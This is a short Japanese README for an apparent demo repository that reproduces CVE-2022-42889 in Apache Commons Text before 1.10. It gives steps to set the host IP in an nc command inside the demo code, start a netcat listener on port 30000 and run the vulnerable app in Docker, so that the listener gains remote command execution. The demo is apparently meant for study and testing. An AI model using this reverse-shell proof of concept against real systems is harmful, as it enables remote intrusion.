
このリポジトリには、CVE-2022-42889の脆弱性があるApache Commons Text < 1.10を使用したシンプルなアプリケーションが含まれています。
DemoApplication.java内のncコマンドをホストのIPアドレスに置き換えてください。
netcatで待ち受ける場合:
$ nc -l -p 30000
脆弱なコードをDockerでビルドして実行
docker build . -t vulnerable-app
docker run vulnerable-app
ご覧の通り、netcatはリモートコマンドを実行できるようになります。